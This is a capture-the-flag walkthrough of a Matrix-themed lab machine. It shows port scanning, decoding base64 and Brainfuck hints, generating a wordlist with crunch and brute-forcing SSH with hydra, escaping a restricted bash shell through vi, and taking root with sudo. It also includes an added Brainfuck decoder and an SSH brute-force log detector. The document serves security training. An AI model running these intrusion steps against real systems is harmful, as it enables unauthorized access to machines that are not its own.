Let's first start off with an nmap scan of the remote host.
root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.103
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-17 16:29 MST
Nmap scan report for wordy (192.168.56.103)
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (EdDSA)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
root@ubuntu:~/src#
Nmap came back with three open ports: 22, 80 and 31337. Two of these look like web servers, so let's visit the pages and see what they have to offer.
http://192.168.56.103:
http://192.168.56.103:31337
If we view the source of the website on port 31337 we find a base64-encoded string embedded in the source code.
class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
Decoding the base64 gives:
root@ubuntu:~/src# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
root@ubuntu:~/src#
Cypher.matrix could be a user name or a file. Let's try it in the URL and see what happens.
http://192.168.56.103:31337/Cypher.matrix
We get back a file encoded in Brainfuck; our next task is to decode the text into something readable. I went to this site to decode the file: https://www.splitbrain.org/_static/ook/
You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
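A Brainfuck program is just eight single-character instructions driving a byte tape, so the file can be decoded offline instead of pasting it into a website. The interpreter below is an added example and not part of the original post; the program it runs is constructed here, not the Cypher.matrix file from the box.

```python
# Minimal Brainfuck interpreter (added example, not the original post's code).

def build_jump_table(code):
    """Map each '[' to its matching ']' and back; reject unbalanced brackets."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")
    return jumps

def run_brainfuck(src, tape_size=30000):
    """Execute a Brainfuck program and return everything it printed."""
    # Anything that is not one of the eight instructions is a comment.
    code = [c for c in src if c in "<>+-.,[]"]
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)          # cells wrap at 8 bits, like most interpreters
    ptr = pc = 0
    out = []
    while pc < len(code):
        op = code[pc]
        if op == ">":
            ptr = (ptr + 1) % tape_size
        elif op == "<":
            ptr = (ptr - 1) % tape_size
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == ",":
            pass                          # the file on the box reads no input; treat ',' as a no-op
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]                # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]                # jump back to the loop start
        pc += 1
    return "".join(out)

# Constructed sample (not the box's file): 10 x 7 = 70, +2 -> 'H', +33 -> 'i'
SAMPLE = "++++++++++[>+++++++<-]>++." + "+" * 33 + "."

if __name__ == "__main__":
    print(run_brainfuck(SAMPLE))   # Hi
```

To decode the real file, read it from disk and pass its contents to run_brainfuck; whitespace and the padding characters in the downloaded text are ignored.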
We get another hint, this time on how to log in to the box, but first we have to generate a password list according to the hint given. For that we will use the crunch wordlist utility.
root@ubuntu:~/src/crunch# ./crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
root@ubuntu:~/src/crunch#
Next we will fire up hydra and start brute-forcing the SSH server with the user guest and the password list we just generated.
root@ubuntu:~/src/crunch# hydra -l guest -P /home/sam/src/crunch/dict.txt ssh://192.168.56.103
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-17 16:46:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: guest   password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-17 16:47:16
root@ubuntu:~/src/crunch#
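A run like this leaves a very recognisable trace on the target: hundreds of "Failed password" lines for one account from one source inside a few seconds, then an "Accepted password". The detector below is an added example (not from the original post) that parses OpenSSH syslog lines and flags any source/account pair exceeding a failure threshold inside a sliding time window; the auth.log excerpt is constructed to mimic that pattern, with the attacker address borrowed from the "Last login from" line later in this post.

```python
from collections import defaultdict
from datetime import datetime
import re

# Constructed auth.log excerpt (not captured from the box) in OpenSSH's syslog format.
AUTH_LOG = """\
Nov 17 16:46:54 porteus sshd[2101]: Failed password for guest from 192.168.56.102 port 51002 ssh2
Nov 17 16:46:54 porteus sshd[2103]: Failed password for guest from 192.168.56.102 port 51004 ssh2
Nov 17 16:46:55 porteus sshd[2105]: Failed password for guest from 192.168.56.102 port 51006 ssh2
Nov 17 16:46:55 porteus sshd[2107]: Failed password for guest from 192.168.56.102 port 51008 ssh2
Nov 17 16:46:56 porteus sshd[2109]: Failed password for guest from 192.168.56.102 port 51010 ssh2
Nov 17 16:46:57 porteus sshd[2111]: Accepted password for guest from 192.168.56.102 port 51012 ssh2
Nov 17 16:50:10 porteus sshd[2200]: Failed password for trinity from 10.0.0.5 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse(log, year=2019):
    # syslog lines carry no year, so the caller supplies one for strptime
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def find_bruteforce(log, threshold=5, window_s=60):
    """Return {(ip, user): (max failures in one window, later success?)} for offenders."""
    fails, success = defaultdict(list), set()
    for ts, result, user, ip in parse(log):
        if result == "Failed":
            fails[(ip, user)].append(ts)
        else:
            success.add((ip, user))
    hits = {}
    for key, times in fails.items():
        times.sort()
        j, best = 0, 0
        for i, t in enumerate(times):          # sliding window over sorted timestamps
            while (t - times[j]).total_seconds() > window_s:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            hits[key] = (best, key in success)   # a success after the burst is the urgent case
    return hits

if __name__ == "__main__":
    print(find_bruteforce(AUTH_LOG))   # {('192.168.56.102', 'guest'): (5, True)}
```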
We found the password for the user 'guest'. Now let's log in to the SSH server and get a system shell.
root@ubuntu:~/src/crunch# ssh guest@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
guest@192.168.56.103's password:
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$
We logged in successfully, but when we try to run commands we see that we are in a restricted bash environment.
guest@porteus:~$ pwd
/home/guest
guest@porteus:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$
One way to break out of the rbash shell is to run the vi command and, within vi, issue a :!/bin/bash command to break out into a normal bash shell.
vi
:!/bin/bash
Once we execute the vi instructions we see that we can change directory and run commands.
guest@porteus:~$ cd /home
guest@porteus:/home$ ls
guest/  trinity/
guest@porteus:/home$
If we check sudo rights for the user guest we get back interesting results.
guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$
We can run all programs, so before we can use sudo su we first need to set up our new unrestricted shell with some PATH variables.
guest@porteus:/home$ export SHELL=/bin/bash:$SHELL
guest@porteus:/home$ export PATH=/usr/bin:$PATH
guest@porteus:/home$ export PATH=/bin:$PATH
After we set up the shell we can try and run 'sudo su' on the system to gain a root shell.
guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
root@porteus:/home/guest# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest# whoami
root
root@porteus:/home/guest#
Now that we have root we can cd to /root and cat flag.txt.
root@porteus:/home/guest# cd /root
root@porteus:~# ls -la
total 74
drwx------ 16 root root 4096 Aug 14  2018 ./
drwxr-xr-x 51 root root 4096 Aug  6  2018 ../
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6187 Nov 18 00:05 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1184 Apr 22  2018 .bashrc
drwx------  5 root root 4096 Aug  6  2018 .cache/
drwxr-xr-x 21 root root 4096 Aug 13  2018 .config/
drwx------  3 root root 4096 Aug  6  2018 .dbus/
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4096 Aug  6  2018 .thumbnails/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Desktop/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Documents/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Downloads/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Music/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Pictures/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Public/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Videos/
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
root@porteus:~# cat flag.txt
_,-. ,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE |_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE |`-._\`.__ `_. IN THE MATRIX AND BEAT OFF |`-._`-.\,-'_| _,-'. `-.|.-' | |`.-'|_ WHAT | |_|,-'_`. |-._,-' | NO, ME NEITHER jrei | | _,' '-|_,-' IT'S JUST A HYPOTHETICAL QUESTION
root@porteus:~#